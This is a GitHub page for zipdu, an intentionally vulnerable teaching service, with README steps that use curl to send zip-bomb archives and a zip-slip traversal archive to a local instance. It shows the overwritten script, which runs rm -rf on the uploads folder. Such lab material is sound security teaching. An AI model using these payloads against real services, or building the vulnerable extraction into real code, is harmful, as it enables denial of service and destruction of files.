Skip to content
/ zipdu Public

zipdu is a webservice implementation vulnerable to zip bombs and directory traversals. Written in multiple different languages

License

Apache-2.0 license
1 star 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

ShiftLeftSecurity/zipdu

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
bombs
bombs
 
 
cplusplus
cplusplus
 
 
go
go
 
 
java
java
 
 
javascript
javascript
 
 
scala
scala
 
 
slips
slips
 
 
uploads
uploads
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
execution.sh
execution.sh
 
 

Repository files navigation

zipdu

zipdu is a web service which exposes an HTTP endpoint that accepts a zip file upload as input and returns its inflated byte size and number of contained files in a JSON-formatted response. zipdu is vulnerable to zip bombs and directory traversal attacks.

Setup

First, follow the README instructions in the language directory of your choice to prepare zipdu for execution.

Second, run zipdu in a terminal session from the root folder of this repository:

// for native binaries [go, cplusplus]
$ ./zipdu
Starting server on port 8000
// ----------------------------------------

// for a jar [java, scala]
$ java -jar zipdu-0.0.1-all.jar
// ...trimmed output
2020-10-18 16:19:48.518:INFO:oejs.Server:Thread-0: Started @154ms
// ----------------------------------------

// for a javascript file
$ node zipdu-dist.js
// ...trimmed output
Serving at http://localhost:8000
// ----------------------------------------

Third, using a tool like curl, confirm that your process responds to HTTP requests against the /health endpoint:

// second terminal session
$ curl http://localhost:8000/health
{"ok":true}

How to execute the zip bomb attack

First, set up zipdu for your language of choice, and run it from the root folder of this repository.

Afterwards, send a POST request to the /zipstats endpoint using the philkatz.zip file found in the bombs directory (compressed size ~971KB, expands to ~1GB):

$ curl -XPOST -F file=@bombs/philkatz.zip http://localhost:8000/zipstats

If you really don't care about messing up the system zipdu is running on, the bombs directory also contains a file named 42.zip which has a compressed size of ~42KB and expands to ~4500TB.

How to execute the directory traversal attack

First, set up zipdu for your language of choice, and run it from the root folder of this repository.

Second, check the contents of the execution.sh script found in the root folder of this repository:

// this file will be overwritten if the directory traversal attack is successfull
$ cat execution.sh 
#!/usr/bin/env bash

echo "Harmless NOOP executed successfully."

Third, execute the directory traversal attack by sending the specially crafted zip archive found under slips/slipwell.zip:

$ curl -XPOST -F file=@slips/slipwell.zip http://localhost:8000/zipstats

Finally, check that the contents of execution.sh have been overwritten:

$ cat execution.sh 
#!/usr/bin/env bash

readonly UPLOAD_FOLDER=./uploads

rm -rf "${UPLOAD_FOLDER}"
echo "This script slipped through and the upload folder is now gone."

Notes

The 42.zip zip bomb was taken from https://www.unforgettable.dk/ and introduced in https://www.usenix.org/system/files/woot19-paper_fifield_0.pdf.

Further reading

https://www.bamsoftware.com/hacks/zipbomb/

About

zipdu is a webservice implementation vulnerable to zip bombs and directory traversals. Written in multiple different languages

Topics

vulnerable directory-traversal vulnerable-application zip-bomb

Resources

Readme

License

Apache-2.0 license
Activity
Custom properties

Stars

1 star

Watchers

10 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages